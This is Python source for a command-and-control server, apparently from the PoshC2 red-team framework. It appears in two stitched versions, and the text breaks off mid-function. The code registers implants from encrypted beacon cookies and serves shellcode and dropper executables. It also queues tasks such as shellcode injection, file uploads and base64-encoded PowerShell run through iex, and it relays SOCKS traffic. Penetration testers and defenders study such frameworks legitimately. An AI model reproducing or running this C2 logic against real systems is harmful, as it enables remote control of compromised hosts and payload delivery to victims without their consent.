def do_GET(self):
try:
"""Respond to a GET request."""
response_content_len = None
response_code = 200
response_content_type = "text/html"
response_content = None
hosted_files = get_hosted_files()
webserver_log("GET request,\nPath: %s\nHeaders:\n%s\n" % (str(self.path), str(self.headers)))
self.cookieHeader = self.headers.get('Cookie')
self.ref = self.headers.get('Referer')
UriPath = str(self.path)
sharplist = []
for hosted_file in sharpurls:
hosted_file = hosted_file.replace(" ", "")
hosted_file = hosted_file.replace("\"", "")
sharplist.append("/" + hosted_file)
self.server_version = ServerHeader
self.sys_version = ""
if not self.cookieHeader:
self.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(self.path)
if new_task:
response_content = new_task
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
webserver_log("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
response_content_len = len(sharpout)
if (len(sharpout) > 0):
response_content = sharpout
except HTTPError as e:
response_code = e.code
webserver_log("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
webserver_log("[-] SharpSocks %s\r\n" % e)
except Exception as e:
webserver_log("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
webserver_log("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + f"Unknown C2 comms incoming (Could be old implant or sharpsocks) - {self.client_address[0]} {UriPath}" + Colours.END)
response_code = 404
HTTPResponsePage = select_item("GET_404_Response", "C2Server")
if HTTPResponsePage:
response_content = bytes(HTTPResponsePage, "utf-8")
else:
response_content = bytes(GET_404_Response, "utf-8")
# dynamically hosted files
elif [ele for ele in hosted_files if(ele.URI in self.path)]:
for hosted_file in hosted_files:
if hosted_file.URI == self.path or f"/{hosted_file.URI}" == self.path and hosted_file.Active == "Yes":
try:
response_content = open(hosted_file.FilePath, 'rb').read()
except FileNotFoundError as e:
print_bad(f"Hosted file not found (src_addr: {self.client_address[0]}): {hosted_file.URI} -> {e.filename}")
response_content_type = hosted_file.ContentType
if hosted_file.Base64 == "Yes":
response_content = base64.b64encode(response_content)
# do this for the python dropper only
if "_py" in hosted_file.URI:
response_content = "a" + "".join("{:02x}".format(c) for c in response_content)
response_content = bytes(response_content, "utf-8")
# register new implant
elif new_implant_url in self.path and self.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if self.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if self.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if self.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if self.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if self.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if self.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if self.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if self.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if self.path == ("%s?j" % new_implant_url):
implant_type = "JXA"
if self.path == ("%s?e" % new_implant_url):
implant_type = "NativeLinux"
if self.path == ("%s?p?e" % new_implant_url):
implant_type = "NativeLinux Proxy"
if implant_type.startswith("C#"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
Domain, User, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";")
URLID = URLID.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), int(URLID))
newImplant.save()
newImplant.display()
newImplant.autoruns()
response_content = encrypt(KEY, newImplant.SharpCore)
elif implant_type.startswith("Python"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
User, Domain, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";")
URLID = URLID.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower(), URLID)
newImplant.save()
newImplant.display()
response_content = encrypt(KEY, newImplant.PythonCore)
elif implant_type.startswith("JXA"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
User, Hostname, PID, ProcName, URLID = decCookie.split(";")
Domain = Hostname
URLID = URLID.replace("\x00", "")
URLID = URLID.replace("\x07", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), "x64", PID, str(ProcName).lower(), URLID)
newImplant.save()
newImplant.display()
response_content = encrypt(KEY, newImplant.JXACore)
elif implant_type.startswith("NativeLinux"):
ProcName = "Linux Dropper"
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
User, Domain, Hostname, Arch, PID, URLID = decCookie.split(";")
URLID = URLID.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), URLID)
newImplant.save()
newImplant.display()
response_content=encrypt(KEY, newImplant.NativeCore)
else:
try:
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";")
URLID = URLID.replace("\x00", "")
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), URLID)
newImplant.save()
newImplant.display()
newImplant.autoruns()
response_content = encrypt(KEY, newImplant.PSCore)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
response_code = 404
HTTPResponsePage = select_item("GET_404_Response", "C2Server")
if HTTPResponsePage:
response_content = bytes(HTTPResponsePage, "utf-8")
else:
response_content = bytes(GET_404_Response, "utf-8")
else:
response_code = 404
HTTPResponsePage = select_item("GET_404_Response", "C2Server")
if HTTPResponsePage:
response_content = bytes(HTTPResponsePage, "utf-8")
else:
response_content = bytes(GET_404_Response, "utf-8")
# send response
self.send_response(response_code)
self.send_header("Content-type", response_content_type)
if response_content_len is not None:
self.send_header("Connection", "close")
self.send_header("Content-Length", response_content_len)
self.end_headers()
if response_content is not None:
self.wfile.write(response_content)
except Exception as e:
webserver_log("Error handling GET request: " + str(e))
webserver_log(traceback.format_exc())
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower(
).startswith("$shellcode64")) or (command.lower(
).startswith("$shellcode86") or command.lower().startswith(
"run-exe core.program core inject-shellcode"
) or command.lower().startswith(
"run-exe pbind pbind run-exe core.program core inject-shellcode"
) or command.lower().startswith(
"pbind-command run-exe core.program core inject-shellcode"
) or command.lower().startswith(
"pbind-pivot-command run-exe core.program core inject-shellcode"
)):
user_command = "Inject Shellcode: %s" % command[
command.index("#") + 1:]
command = command[:command.index("#")]
elif " -pycode " in command.lower():
split_command = command.strip().split()
args = split_command[3:]
module = split_command[0]
user_command = module + " " + " ".join(args)
elif (command.lower().startswith('upload-file')
or command.lower().startswith(
'pbind-command upload-file')
or command.lower().startswith(
'fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith(
'pbind-command upload-file'):
PBind = True
if command.lower().startswith(
'fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" %
upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(
upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(
Colours.RED +
f"Error, no bytes read from the upload file, removing task: {upload_file}"
+ Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(
upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" %
upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(
base64.b64decode(
upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError(
'Task ID is greater than 5 characters which is not supported.'
)
print(Colours.YELLOW)
if user is not None and user != "":
print(
"Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)"
% (taskIdStr, user, implant.ImplantID,
implant.Domain, implant.User, implant.Hostname,
now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print(
"Task %s issued against implant %s on host %s\\%s @ %s (%s)"
% (taskIdStr, implant.ImplantID, implant.Domain,
implant.User, implant.Hostname,
now.strftime("%Y-%m-%d %H:%M:%S")))
try:
if (user_command.lower().startswith(
"run-exe sharpwmi.program sharpwmi action=execute"
) or user_command.lower().startswith(
"pbind-command run-exe sharpwmi.program sharpwmi action=execute"
) or user_command.lower().startswith(
"fcomm-command run-exe sharpwmi.program sharpwmi action=execute"
)):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
command = ""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(
cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith(
"pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace(
"pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(
cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(
f"run-exe Program PS {base64string}".encode(
"utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(
f"run-exe PBind PBind {modulestr}".encode(
"utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith(
"pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace(
"pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(
cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(
f"run-exe Program PS {base64string}".encode(
"utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith(
"fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace(
"fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(
cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace(
"pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(
f"run-exe PBind PBind \"loadmodule{modulestr}\""
.encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace(
"pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(
bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(
cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace(
"pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace(
"pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace(
"fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(
bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace(
"fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace(
"fcomm-connect ",
"run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace(
"fcomm-kill",
"run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(
cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(
f"run-exe PBind PBind {base64string1}".encode(
"utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace(
"pbind-pivot-connect ",
"run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace(
"pbind-pivot-kill",
"run-exe PBind PBind run-exe PBind PBind kill-implant"
)
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"),
RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"),
RandomURI)
return default_response()
def do_GET(self):
try:
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n",
str(self.path), str(self.headers))
new_implant_url = get_newimplanturl()
self.cookieHeader = self.headers.get('Cookie')
self.ref = self.headers.get('Referer')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(self.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
self.server_version = ServerHeader
self.sys_version = ""
if not self.cookieHeader:
self.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(self.path)
if new_task:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(new_task)
elif [ele for ele in sharplist if (ele in UriPath)]:
try:
open("%swebserver.log" % PoshProjectDirectory, "a").write(
"%s - [%s] Making GET connection to SharpSocks %s%s\r\n"
% (self.address_string(), self.log_date_time_string(),
SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath),
headers={
'Accept-Encoding': 'gzip',
'Cookie': '%s' % self.cookieHeader,
'User-Agent': UserAgent
})
res = urlopen(r)
sharpout = res.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
if (len(sharpout) > 0):
self.wfile.write(sharpout)
except HTTPError as e:
self.send_response(e.code)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write(
"[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n"
% (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory,
"a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % PoshProjectDirectory, "a").write(
"[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n"
% (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory,
"a").write("[-] SharpSocks %s\r\n" % e)
print(
Colours.RED +
"Error with SharpSocks or old implant connection - is SharpSocks running"
+ Colours.END)
print(Colours.RED + UriPath + Colours.END)
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("GET_404_Response",
"C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(GET_404_Response, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in self.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_rp" % QuickCommandURI) in self.path:
filename = "%spayload.txt" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = base64.b64encode(f.read())
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in self.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in self.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in self.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c)
for c in content)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in self.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in self.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
# register new implant
elif new_implant_url in self.path and self.cookieHeader.startswith(
"SessionID"):
implant_type = "PS"
if self.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if self.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if self.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if self.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if self.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if self.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if self.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if self.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0],
self.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(
";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain),
str(User), str(Hostname), Arch, PID,
Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.SharpCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0],
self.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(
";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain),
str(User), str(Hostname), Arch, PID,
Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
else:
try:
cookieVal = (self.cookieHeader).replace(
"SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(
";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (self.client_address[0],
self.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type,
str(Domain), str(User),
str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("GET_404_Response",
"C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(GET_404_Response, "utf-8"))
else:
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("GET_404_Response", "C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(GET_404_Response, "utf-8"))
except Exception as e:
if 'broken pipe' not in str(e).lower():
print_bad("Error handling GET request: " + e)
traceback.print_exc()
def newTask(path):
result = DB.get_implants_all()
commands = ""
if result:
for i in result:
RandomURI = i[1]
EncKey = i[5]
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for a in tasks:
command = a[2]
user = a[3]
user_command = command
hostinfo = DB.get_hostinfo(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (
command.lower().startswith("$shellcode86")
or command.lower().startswith(
"run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[
command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith('upload-file')):
upload_args = command.replace('upload-file', '')
upload_file = upload_args.split()[0]
try:
upload_file_destination = upload_args.split()[1]
except:
print(Colours.RED)
print("Error parsing upload command: %s" %
upload_args)
print(Colours.GREEN)
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(
upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(
Colours.RED +
f"Error, no bytes read from the upload file, removing task: {upload_file}"
+ Colours.GREEN)
DB.del_newtasks(str(a[0]))
continue
upload_file_bytes_b64 = base64.b64encode(
upload_file_bytes).decode("utf-8")
if implant_type.startswith('C#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.startswith('PS'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.startswith('PY'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" %
upload_args)
print(Colours.GREEN)
filehash = hashlib.md5(
base64.b64decode(
upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError(
'Task ID is greater than 5 characters which is not supported.'
)
print(Colours.YELLOW)
if user is not None and user != "":
print(
"Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)"
% (taskIdStr, user, hostinfo[0], hostinfo[11],
hostinfo[2], hostinfo[3],
now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print(
"Task %s issued against implant %s on host %s\\%s @ %s (%s)"
%
(taskIdStr, hostinfo[0], hostinfo[11], hostinfo[2],
